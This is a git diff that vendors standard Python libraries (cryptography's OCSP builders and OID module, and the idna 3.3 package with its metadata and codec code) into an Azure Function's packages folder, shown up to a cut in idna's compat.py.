This is a value from the OCSPResponseStatus + enumeration + """ + + @abc.abstractproperty + def signature_algorithm_oid(self) -> x509.ObjectIdentifier: + """ + The ObjectIdentifier of the signature algorithm + """ + + @abc.abstractproperty + def signature_hash_algorithm( + self, + ) -> typing.Optional[hashes.HashAlgorithm]: + """ + Returns a HashAlgorithm corresponding to the type of the digest signed + """ + + @abc.abstractproperty + def signature(self) -> bytes: + """ + The signature bytes + """ + + @abc.abstractproperty + def tbs_response_bytes(self) -> bytes: + """ + The tbsResponseData bytes + """ + + @abc.abstractproperty + def certificates(self) -> typing.List[x509.Certificate]: + """ + A list of certificates used to help build a chain to verify the OCSP + response. This situation occurs when the OCSP responder uses a delegate + certificate. + """ + + @abc.abstractproperty + def responder_key_hash(self) -> typing.Optional[bytes]: + """ + The responder's key hash or None + """ + + @abc.abstractproperty + def responder_name(self) -> typing.Optional[x509.Name]: + """ + The responder's Name or None + """ + + @abc.abstractproperty + def produced_at(self) -> datetime.datetime: + """ + The time the response was produced + """ + + @abc.abstractproperty + def certificate_status(self) -> OCSPCertStatus: + """ + The status of the certificate (an element from the OCSPCertStatus enum) + """ + + @abc.abstractproperty + def revocation_time(self) -> typing.Optional[datetime.datetime]: + """ + The date of when the certificate was revoked or None if not + revoked. + """ + + @abc.abstractproperty + def revocation_reason(self) -> typing.Optional[x509.ReasonFlags]: + """ + The reason the certificate was revoked or None if not specified or + not revoked. + """ + + @abc.abstractproperty + def this_update(self) -> datetime.datetime: + """ + The most recent time at which the status being indicated is known by + the responder to have been correct + """ + + @abc.abstractproperty + def next_update(self) -> typing.Optional[datetime.datetime]: + """ + The time when newer information will be available + """ + + @abc.abstractproperty + def issuer_key_hash(self) -> bytes: + """ + The hash of the issuer public key + """ + + @abc.abstractproperty + def issuer_name_hash(self) -> bytes: + """ + The hash of the issuer name + """ + + @abc.abstractproperty + def hash_algorithm(self) -> hashes.HashAlgorithm: + """ + The hash algorithm used in the issuer name and key hashes + """ + + @abc.abstractproperty + def serial_number(self) -> int: + """ + The serial number of the cert whose status is being checked + """ + + @abc.abstractproperty + def extensions(self) -> x509.Extensions: + """ + The list of response extensions. Not single response extensions. + """ + + @abc.abstractproperty + def single_extensions(self) -> x509.Extensions: + """ + The list of single response extensions. Not response extensions. 
+ """ + + @abc.abstractmethod + def public_bytes(self, encoding: serialization.Encoding) -> bytes: + """ + Serializes the response to DER + """ + + +class OCSPRequestBuilder: + def __init__( + self, + request: typing.Optional[ + typing.Tuple[ + x509.Certificate, x509.Certificate, hashes.HashAlgorithm + ] + ] = None, + extensions: typing.List[x509.Extension[x509.ExtensionType]] = [], + ) -> None: + self._request = request + self._extensions = extensions + + def add_certificate( + self, + cert: x509.Certificate, + issuer: x509.Certificate, + algorithm: hashes.HashAlgorithm, + ) -> "OCSPRequestBuilder": + if self._request is not None: + raise ValueError("Only one certificate can be added to a request") + + _verify_algorithm(algorithm) + if not isinstance(cert, x509.Certificate) or not isinstance( + issuer, x509.Certificate + ): + raise TypeError("cert and issuer must be a Certificate") + + return OCSPRequestBuilder((cert, issuer, algorithm), self._extensions) + + def add_extension( + self, extval: x509.ExtensionType, critical: bool + ) -> "OCSPRequestBuilder": + if not isinstance(extval, x509.ExtensionType): + raise TypeError("extension must be an ExtensionType") + + extension = x509.Extension(extval.oid, critical, extval) + _reject_duplicate_extension(extension, self._extensions) + + return OCSPRequestBuilder( + self._request, self._extensions + [extension] + ) + + def build(self) -> OCSPRequest: + if self._request is None: + raise ValueError("You must add a certificate before building") + + return ocsp.create_ocsp_request(self) + + +class OCSPResponseBuilder: + def __init__( + self, + response: typing.Optional[_SingleResponse] = None, + responder_id: typing.Optional[ + typing.Tuple[x509.Certificate, OCSPResponderEncoding] + ] = None, + certs: typing.Optional[typing.List[x509.Certificate]] = None, + extensions: typing.List[x509.Extension[x509.ExtensionType]] = [], + ): + self._response = response + self._responder_id = responder_id + self._certs = certs + self._extensions = extensions + + def add_response( + self, + cert: x509.Certificate, + issuer: x509.Certificate, + algorithm: hashes.HashAlgorithm, + cert_status: OCSPCertStatus, + this_update: datetime.datetime, + next_update: typing.Optional[datetime.datetime], + revocation_time: typing.Optional[datetime.datetime], + revocation_reason: typing.Optional[x509.ReasonFlags], + ) -> "OCSPResponseBuilder": + if self._response is not None: + raise ValueError("Only one response per OCSPResponse.") + + singleresp = _SingleResponse( + cert, + issuer, + algorithm, + cert_status, + this_update, + next_update, + revocation_time, + revocation_reason, + ) + return OCSPResponseBuilder( + singleresp, + self._responder_id, + self._certs, + self._extensions, + ) + + def responder_id( + self, encoding: OCSPResponderEncoding, responder_cert: x509.Certificate + ) -> "OCSPResponseBuilder": + if self._responder_id is not None: + raise ValueError("responder_id can only be set once") + if not isinstance(responder_cert, x509.Certificate): + raise TypeError("responder_cert must be a Certificate") + if not isinstance(encoding, OCSPResponderEncoding): + raise TypeError( + "encoding must be an element from OCSPResponderEncoding" + ) + + return OCSPResponseBuilder( + self._response, + (responder_cert, encoding), + self._certs, + self._extensions, + ) + + def certificates( + self, certs: typing.Iterable[x509.Certificate] + ) -> "OCSPResponseBuilder": + if self._certs is not None: + raise ValueError("certificates may only be set once") + certs = list(certs) + if 
len(certs) == 0: + raise ValueError("certs must not be an empty list") + if not all(isinstance(x, x509.Certificate) for x in certs): + raise TypeError("certs must be a list of Certificates") + return OCSPResponseBuilder( + self._response, + self._responder_id, + certs, + self._extensions, + ) + + def add_extension( + self, extval: x509.ExtensionType, critical: bool + ) -> "OCSPResponseBuilder": + if not isinstance(extval, x509.ExtensionType): + raise TypeError("extension must be an ExtensionType") + + extension = x509.Extension(extval.oid, critical, extval) + _reject_duplicate_extension(extension, self._extensions) + + return OCSPResponseBuilder( + self._response, + self._responder_id, + self._certs, + self._extensions + [extension], + ) + + def sign( + self, + private_key: CERTIFICATE_PRIVATE_KEY_TYPES, + algorithm: typing.Optional[hashes.HashAlgorithm], + ) -> OCSPResponse: + if self._response is None: + raise ValueError("You must add a response before signing") + if self._responder_id is None: + raise ValueError("You must add a responder_id before signing") + + return ocsp.create_ocsp_response( + OCSPResponseStatus.SUCCESSFUL, self, private_key, algorithm + ) + + @classmethod + def build_unsuccessful( + cls, response_status: OCSPResponseStatus + ) -> OCSPResponse: + if not isinstance(response_status, OCSPResponseStatus): + raise TypeError( + "response_status must be an item from OCSPResponseStatus" + ) + if response_status is OCSPResponseStatus.SUCCESSFUL: + raise ValueError("response_status cannot be SUCCESSFUL") + + return ocsp.create_ocsp_response(response_status, None, None, None) + + +def load_der_ocsp_request(data: bytes) -> OCSPRequest: + return ocsp.load_der_ocsp_request(data) + + +def load_der_ocsp_response(data: bytes) -> OCSPResponse: + return ocsp.load_der_ocsp_response(data) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/x509/oid.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/x509/oid.py new file mode 100644 index 0000000..73130c7 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/x509/oid.py @@ -0,0 +1,32 @@ +# This file is dual licensed under the terms of the Apache License, Version +# 2.0, and the BSD License. See the LICENSE file in the root of this repository +# for complete details. 
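+#
+# As a brief illustrative sketch (not part of this module), the names
+# re-exported below are typically used like this:
+#
+#   from cryptography.x509.oid import NameOID, ExtensionOID
+#   NameOID.COMMON_NAME             # ObjectIdentifier for commonName
+#   ExtensionOID.BASIC_CONSTRAINTS  # ObjectIdentifier for basicConstraints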
+ +from cryptography.hazmat._oid import ( + AttributeOID, + AuthorityInformationAccessOID, + CRLEntryExtensionOID, + CertificatePoliciesOID, + ExtendedKeyUsageOID, + ExtensionOID, + NameOID, + OCSPExtensionOID, + ObjectIdentifier, + SignatureAlgorithmOID, + SubjectInformationAccessOID, +) + + +__all__ = [ + "AttributeOID", + "AuthorityInformationAccessOID", + "CRLEntryExtensionOID", + "CertificatePoliciesOID", + "ExtendedKeyUsageOID", + "ExtensionOID", + "NameOID", + "OCSPExtensionOID", + "ObjectIdentifier", + "SignatureAlgorithmOID", + "SubjectInformationAccessOID", +] diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/idna-3.3.dist-info/INSTALLER b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/idna-3.3.dist-info/INSTALLER new file mode 100644 index 0000000..4660be2 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/idna-3.3.dist-info/INSTALLER @@ -0,0 +1 @@ +pip diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/idna-3.3.dist-info/LICENSE.md b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/idna-3.3.dist-info/LICENSE.md new file mode 100644 index 0000000..ab1e1b2 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/idna-3.3.dist-info/LICENSE.md @@ -0,0 +1,29 @@ +BSD 3-Clause License + +Copyright (c) 2013-2021, Kim Davies +All rights reserved. + +Redistribution and use in source and binary forms, with or without +modification, are permitted provided that the following conditions are met: + +1. Redistributions of source code must retain the above copyright notice, this + list of conditions and the following disclaimer. + +2. Redistributions in binary form must reproduce the above copyright notice, + this list of conditions and the following disclaimer in the documentation + and/or other materials provided with the distribution. + +3. Neither the name of the copyright holder nor the names of its + contributors may be used to endorse or promote products derived from + this software without specific prior written permission. + +THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" +AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE +IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE +DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE +FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL +DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR +SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER +CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, +OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE +OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 
diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/idna-3.3.dist-info/METADATA b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/idna-3.3.dist-info/METADATA
new file mode 100644
index 0000000..21ce53a
--- /dev/null
+++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/idna-3.3.dist-info/METADATA
@@ -0,0 +1,236 @@
+Metadata-Version: 2.1
+Name: idna
+Version: 3.3
+Summary: Internationalized Domain Names in Applications (IDNA)
+Home-page: https://github.com/kjd/idna
+Author: Kim Davies
+Author-email: kim@cynosure.com.au
+License: BSD-3-Clause
+Platform: UNKNOWN
+Classifier: Development Status :: 5 - Production/Stable
+Classifier: Intended Audience :: Developers
+Classifier: Intended Audience :: System Administrators
+Classifier: License :: OSI Approved :: BSD License
+Classifier: Operating System :: OS Independent
+Classifier: Programming Language :: Python
+Classifier: Programming Language :: Python :: 3
+Classifier: Programming Language :: Python :: 3 :: Only
+Classifier: Programming Language :: Python :: 3.5
+Classifier: Programming Language :: Python :: 3.6
+Classifier: Programming Language :: Python :: 3.7
+Classifier: Programming Language :: Python :: 3.8
+Classifier: Programming Language :: Python :: 3.9
+Classifier: Programming Language :: Python :: 3.10
+Classifier: Programming Language :: Python :: Implementation :: CPython
+Classifier: Programming Language :: Python :: Implementation :: PyPy
+Classifier: Topic :: Internet :: Name Service (DNS)
+Classifier: Topic :: Software Development :: Libraries :: Python Modules
+Classifier: Topic :: Utilities
+Requires-Python: >=3.5
+License-File: LICENSE.md
+
+Internationalized Domain Names in Applications (IDNA)
+=====================================================
+
+Support for the Internationalised Domain Names in Applications
+(IDNA) protocol as specified in RFC 5891. This is the latest version of
+the protocol and is sometimes referred to as “IDNA 2008”.
+
+This library also provides support for Unicode Technical Standard 46,
+Unicode IDNA Compatibility Processing.
+
+This acts as a suitable replacement for the “encodings.idna” module that
+comes with the Python standard library, but which only supports the
+older, superseded IDNA specification (RFC 3490).
+
+Basic functions are simply executed:
+
+.. code-block:: pycon
+
+    >>> import idna
+    >>> idna.encode('ドメイン.テスト')
+    b'xn--eckwd4c7c.xn--zckzah'
+    >>> print(idna.decode('xn--eckwd4c7c.xn--zckzah'))
+    ドメイン.テスト
+
+
+Installation
+------------
+
+To install this library, you can use pip:
+
+.. code-block:: bash
+
+    $ pip install idna
+
+Alternatively, you can install the package using the bundled setup script:
+
+.. code-block:: bash
+
+    $ python setup.py install
+
+
+Usage
+-----
+
+For typical usage, the ``encode`` and ``decode`` functions will take a
+domain name argument and perform a conversion to A-labels or U-labels
+respectively.
+
+.. code-block:: pycon
+
+    >>> import idna
+    >>> idna.encode('ドメイン.テスト')
+    b'xn--eckwd4c7c.xn--zckzah'
+    >>> print(idna.decode('xn--eckwd4c7c.xn--zckzah'))
+    ドメイン.テスト
+
+You may use the codec encoding and decoding methods using the
+``idna.codec`` module:
+
+.. code-block:: pycon
+
+    >>> import idna.codec
+    >>> print('домен.испытание'.encode('idna'))
+    b'xn--d1acufc.xn--80akhbyknj4f'
+    >>> print(b'xn--d1acufc.xn--80akhbyknj4f'.decode('idna'))
+    домен.испытание
+
+Conversions can be applied on a per-label basis using the ``ulabel`` or
+``alabel`` functions if necessary:
+
+.. code-block:: pycon
+
+    >>> idna.alabel('测试')
+    b'xn--0zwm56d'
+
+Compatibility Mapping (UTS #46)
++++++++++++++++++++++++++++++++
+
+As described in RFC 5895, the IDNA specification does not normalize input
+from the different potential ways a user may input a domain name. This
+functionality, known as a “mapping”, is considered by the specification
+to be a local user-interface issue distinct from IDNA conversion
+functionality.
+
+This library provides one such mapping that was developed by the Unicode
+Consortium. Known as Unicode IDNA Compatibility Processing, it provides
+both a regular mapping for typical applications and a transitional
+mapping to help migrate from older IDNA 2003 applications.
+
+For example, “Königsgäßchen” is not a permissible label as *LATIN CAPITAL
+LETTER K* is not allowed (nor are capital letters in general). UTS 46
+will convert this into lower case prior to applying the IDNA conversion.
+
+.. code-block:: pycon
+
+    >>> import idna
+    >>> idna.encode('Königsgäßchen')
+    ...
+    idna.core.InvalidCodepoint: Codepoint U+004B at position 1 of 'Königsgäßchen' not allowed
+    >>> idna.encode('Königsgäßchen', uts46=True)
+    b'xn--knigsgchen-b4a3dun'
+    >>> print(idna.decode('xn--knigsgchen-b4a3dun'))
+    königsgäßchen
+
+Transitional processing provides conversions to help transition from the
+older 2003 standard to the current standard. For example, in the original
+IDNA specification, the *LATIN SMALL LETTER SHARP S* (ß) was converted
+into two *LATIN SMALL LETTER S* (ss), whereas in the current IDNA
+specification this conversion is not performed.
+
+.. code-block:: pycon
+
+    >>> idna.encode('Königsgäßchen', uts46=True, transitional=True)
+    'xn--knigsgsschen-lcb0w'
+
+Implementors should use transitional processing with caution, and only
+in the rare cases where conversion from legacy labels to current labels
+must be performed (i.e. IDNA implementations that pre-date 2008). For
+typical applications that just need to convert labels, transitional
+processing is unlikely to be beneficial and could produce unexpected,
+incompatible results.
+
+``encodings.idna`` Compatibility
+++++++++++++++++++++++++++++++++
+
+Function calls from the Python built-in ``encodings.idna`` module are
+mapped to their IDNA 2008 equivalents using the ``idna.compat`` module.
+Simply substitute the ``import`` clause in your code to refer to the new
+module name.
+
+Exceptions
+----------
+
+All errors raised during the conversion following the specification are
+derived from the ``idna.IDNAError`` base class.
+
+More specific exceptions may be generated: ``idna.IDNABidiError`` when
+the error reflects an illegal combination of left-to-right and
+right-to-left characters in a label; ``idna.InvalidCodepoint`` when a
+specific codepoint is an illegal character in an IDN label (i.e. it is
+INVALID); and ``idna.InvalidCodepointContext`` when the codepoint is
+illegal based on its positional context (i.e. it is CONTEXTO or CONTEXTJ
+but the contextual requirements are not satisfied).
+
+Building and Diagnostics
+------------------------
+
+The IDNA and UTS 46 functionality relies upon pre-calculated lookup
+tables for performance. These tables are derived from computing against
+eligibility criteria in the respective standards. These tables are
+computed using the command-line script ``tools/idna-data``.
+
+This tool will fetch relevant codepoint data from the Unicode repository
+and perform the required calculations to identify eligibility. There are
+three main modes:
+
+* ``idna-data make-libdata``. Generates ``idnadata.py`` and
+  ``uts46data.py``, the pre-calculated lookup tables used for IDNA and
+  UTS 46 conversions. Implementors who wish to track this library
+  against a different Unicode version may use this tool to manually
+  generate a different version of the ``idnadata.py`` and
+  ``uts46data.py`` files.
+
+* ``idna-data make-table``. Generates a table of the IDNA disposition
+  (e.g. PVALID, CONTEXTJ, CONTEXTO) in the format found in Appendix B.1
+  of RFC 5892 and in the pre-computed tables published by IANA.
+
+* ``idna-data U+0061``. Prints debugging output on the various
+  properties associated with an individual Unicode codepoint (in this
+  case, U+0061) that are used to assess the IDNA and UTS 46 status of a
+  codepoint. This is helpful in debugging or analysis.
+
+The tool accepts a number of arguments, described using ``idna-data -h``.
+Most notably, the ``--version`` argument allows the specification of the
+version of Unicode to use in computing the table data. For example,
+``idna-data --version 9.0.0 make-libdata`` will generate library data
+against Unicode 9.0.0.
+
+
+Additional Notes
+----------------
+
+* **Packages**. The latest tagged release version is published in the
+  Python Package Index.
+
+* **Version support**. This library supports Python 3.5 and higher. As
+  this library serves as a low-level toolkit for a variety of
+  applications, many of which strive for broad compatibility with older
+  Python versions, there is no rush to remove older interpreter
+  support. Removing support for older versions should be well justified
+  in that the maintenance burden has become too high.
+
+* **Python 2**. Python 2 is supported by version 2.x of this library.
+  While active development of the version 2.x series has ended, notable
+  issues being corrected may be backported to 2.x. Use "idna<3" in your
+  requirements file if you need this library for a Python 2 application.
+
+* **Testing**. The library has a test suite based on each rule of the
+  IDNA specification, as well as tests that are provided as part of the
+  Unicode Technical Standard 46, Unicode IDNA Compatibility Processing.
+
+* **Emoji**. It is an occasional request to support emoji domains in
+  this library. Encoding of symbols like emoji is expressly prohibited
+  by the technical standard IDNA 2008, and emoji domains are broadly
+  phased out across the domain industry due to associated security
+  risks. For now, applications that need to support these non-compliant
+  labels may wish to consider trying the encode/decode operation in this
+  library first, and then falling back to using ``encodings.idna``; a
+  sketch of that fallback follows below. See the Github project for more
+  discussion.
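+
+A minimal sketch of that fallback approach (``to_ascii_with_fallback``
+is a hypothetical helper for illustration, not part of this library):
+
+.. code-block:: python
+
+    import idna
+
+    def to_ascii_with_fallback(domain: str) -> bytes:
+        try:
+            # Strict IDNA 2008 conversion; failures raise a subclass
+            # of idna.IDNAError.
+            return idna.encode(domain, uts46=True)
+        except idna.IDNAError:
+            # Fall back to the legacy IDNA 2003 codec shipped with the
+            # standard library ("encodings.idna") for non-compliant
+            # labels.
+            return domain.encode('idna')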
+ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/idna-3.3.dist-info/RECORD b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/idna-3.3.dist-info/RECORD new file mode 100644 index 0000000..2c9f0dd --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/idna-3.3.dist-info/RECORD @@ -0,0 +1,23 @@ +idna-3.3.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4 +idna-3.3.dist-info/LICENSE.md,sha256=otbk2UC9JNvnuWRc3hmpeSzFHbeuDVrNMBrIYMqj6DY,1523 +idna-3.3.dist-info/METADATA,sha256=BdqiAf8ou4x1nzIHp2_sDfXWjl7BrSUGpOeVzbYHQuQ,9765 +idna-3.3.dist-info/RECORD,, +idna-3.3.dist-info/WHEEL,sha256=ewwEueio1C2XeHTvT17n8dZUJgOvyCWCt0WVNLClP9o,92 +idna-3.3.dist-info/top_level.txt,sha256=jSag9sEDqvSPftxOQy-ABfGV_RSy7oFh4zZJpODV8k0,5 +idna/__init__.py,sha256=KJQN1eQBr8iIK5SKrJ47lXvxG0BJ7Lm38W4zT0v_8lk,849 +idna/__pycache__/__init__.cpython-39.pyc,, +idna/__pycache__/codec.cpython-39.pyc,, +idna/__pycache__/compat.cpython-39.pyc,, +idna/__pycache__/core.cpython-39.pyc,, +idna/__pycache__/idnadata.cpython-39.pyc,, +idna/__pycache__/intranges.cpython-39.pyc,, +idna/__pycache__/package_data.cpython-39.pyc,, +idna/__pycache__/uts46data.cpython-39.pyc,, +idna/codec.py,sha256=6ly5odKfqrytKT9_7UrlGklHnf1DSK2r9C6cSM4sa28,3374 +idna/compat.py,sha256=0_sOEUMT4CVw9doD3vyRhX80X19PwqFoUBs7gWsFME4,321 +idna/core.py,sha256=RFIkY-HhFZaDoBEFjGwyGd_vWI04uOAQjnzueMWqwOU,12795 +idna/idnadata.py,sha256=fzMzkCea2xieVxcrjngJ-2pLsKQNejPCZFlBajIuQdw,44025 +idna/intranges.py,sha256=YBr4fRYuWH7kTKS2tXlFjM24ZF1Pdvcir-aywniInqg,1881 +idna/package_data.py,sha256=szxQhV0ZD0nKJ84Kuobw3l8q4_KeCyXjFRdpwIpKZmw,21 +idna/py.typed,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0 +idna/uts46data.py,sha256=o-D7V-a0fOLZNd7tvxof6MYfUd0TBZzE2bLR5XO67xU,204400 diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/idna-3.3.dist-info/WHEEL b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/idna-3.3.dist-info/WHEEL new file mode 100644 index 0000000..725a409 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/idna-3.3.dist-info/WHEEL @@ -0,0 +1,5 @@ +Wheel-Version: 1.0 +Generator: bdist_wheel (0.37.0) +Root-Is-Purelib: true +Tag: py3-none-any + diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/idna-3.3.dist-info/top_level.txt b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/idna-3.3.dist-info/top_level.txt new file mode 100644 index 0000000..dd747e7 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/idna-3.3.dist-info/top_level.txt @@ -0,0 +1 @@ +idna diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/idna/__init__.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/idna/__init__.py new file mode 100644 index 0000000..9c079de --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/idna/__init__.py @@ -0,0 +1,44 @@ +from .package_data import __version__ +from .core import ( + IDNABidiError, + IDNAError, + InvalidCodepoint, + InvalidCodepointContext, + alabel, + check_bidi, + check_hyphen_ok, + check_initial_combiner, + check_label, + check_nfc, + decode, + encode, + ulabel, + uts46_remap, + valid_contextj, + valid_contexto, + 
valid_label_length, + valid_string_length, +) +from .intranges import intranges_contain + +__all__ = [ + "IDNABidiError", + "IDNAError", + "InvalidCodepoint", + "InvalidCodepointContext", + "alabel", + "check_bidi", + "check_hyphen_ok", + "check_initial_combiner", + "check_label", + "check_nfc", + "decode", + "encode", + "intranges_contain", + "ulabel", + "uts46_remap", + "valid_contextj", + "valid_contexto", + "valid_label_length", + "valid_string_length", +] diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/idna/__pycache__/__init__.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/idna/__pycache__/__init__.cpython-39.pyc new file mode 100644 index 0000000..c6a214b Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/idna/__pycache__/__init__.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/idna/__pycache__/codec.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/idna/__pycache__/codec.cpython-39.pyc new file mode 100644 index 0000000..52349f5 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/idna/__pycache__/codec.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/idna/__pycache__/compat.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/idna/__pycache__/compat.cpython-39.pyc new file mode 100644 index 0000000..8c2bb9a Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/idna/__pycache__/compat.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/idna/__pycache__/core.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/idna/__pycache__/core.cpython-39.pyc new file mode 100644 index 0000000..bee341e Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/idna/__pycache__/core.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/idna/__pycache__/idnadata.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/idna/__pycache__/idnadata.cpython-39.pyc new file mode 100644 index 0000000..8f57d2f Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/idna/__pycache__/idnadata.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/idna/__pycache__/intranges.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/idna/__pycache__/intranges.cpython-39.pyc new file mode 100644 index 0000000..a4d69ca Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/idna/__pycache__/intranges.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/idna/__pycache__/package_data.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/idna/__pycache__/package_data.cpython-39.pyc new file mode 100644 index 0000000..9f0f743 Binary files 
/dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/idna/__pycache__/package_data.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/idna/__pycache__/uts46data.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/idna/__pycache__/uts46data.cpython-39.pyc new file mode 100644 index 0000000..1b3ea9a Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/idna/__pycache__/uts46data.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/idna/codec.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/idna/codec.py new file mode 100644 index 0000000..0f0e4da --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/idna/codec.py @@ -0,0 +1,112 @@ +from .core import encode, decode, alabel, ulabel, IDNAError +import codecs +import re +from typing import Tuple, Optional + +_unicode_dots_re = re.compile('[\u002e\u3002\uff0e\uff61]') + +class Codec(codecs.Codec): + + def encode(self, data: str, errors: str = 'strict') -> Tuple[bytes, int]: + if errors != 'strict': + raise IDNAError('Unsupported error handling \"{}\"'.format(errors)) + + if not data: + return b"", 0 + + return encode(data), len(data) + + def decode(self, data: bytes, errors: str = 'strict') -> Tuple[str, int]: + if errors != 'strict': + raise IDNAError('Unsupported error handling \"{}\"'.format(errors)) + + if not data: + return '', 0 + + return decode(data), len(data) + +class IncrementalEncoder(codecs.BufferedIncrementalEncoder): + def _buffer_encode(self, data: str, errors: str, final: bool) -> Tuple[str, int]: # type: ignore + if errors != 'strict': + raise IDNAError('Unsupported error handling \"{}\"'.format(errors)) + + if not data: + return "", 0 + + labels = _unicode_dots_re.split(data) + trailing_dot = '' + if labels: + if not labels[-1]: + trailing_dot = '.' + del labels[-1] + elif not final: + # Keep potentially unfinished label until the next call + del labels[-1] + if labels: + trailing_dot = '.' + + result = [] + size = 0 + for label in labels: + result.append(alabel(label)) + if size: + size += 1 + size += len(label) + + # Join with U+002E + result_str = '.'.join(result) + trailing_dot # type: ignore + size += len(trailing_dot) + return result_str, size + +class IncrementalDecoder(codecs.BufferedIncrementalDecoder): + def _buffer_decode(self, data: str, errors: str, final: bool) -> Tuple[str, int]: # type: ignore + if errors != 'strict': + raise IDNAError('Unsupported error handling \"{}\"'.format(errors)) + + if not data: + return ('', 0) + + labels = _unicode_dots_re.split(data) + trailing_dot = '' + if labels: + if not labels[-1]: + trailing_dot = '.' + del labels[-1] + elif not final: + # Keep potentially unfinished label until the next call + del labels[-1] + if labels: + trailing_dot = '.' 
+ + result = [] + size = 0 + for label in labels: + result.append(ulabel(label)) + if size: + size += 1 + size += len(label) + + result_str = '.'.join(result) + trailing_dot + size += len(trailing_dot) + return (result_str, size) + + +class StreamWriter(Codec, codecs.StreamWriter): + pass + + +class StreamReader(Codec, codecs.StreamReader): + pass + + +def getregentry() -> codecs.CodecInfo: + # Compatibility as a search_function for codecs.register() + return codecs.CodecInfo( + name='idna', + encode=Codec().encode, # type: ignore + decode=Codec().decode, # type: ignore + incrementalencoder=IncrementalEncoder, + incrementaldecoder=IncrementalDecoder, + streamwriter=StreamWriter, + streamreader=StreamReader, + ) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/idna/compat.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/idna/compat.py new file mode 100644 index 0000000..85972dc --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/idna/compat.py @@ -0,0 +1,13 @@ +from .core import * +from .codec import * +from typing import Any, Union + +def ToASCII(label: str) -> bytes: + return encode(label) + +def 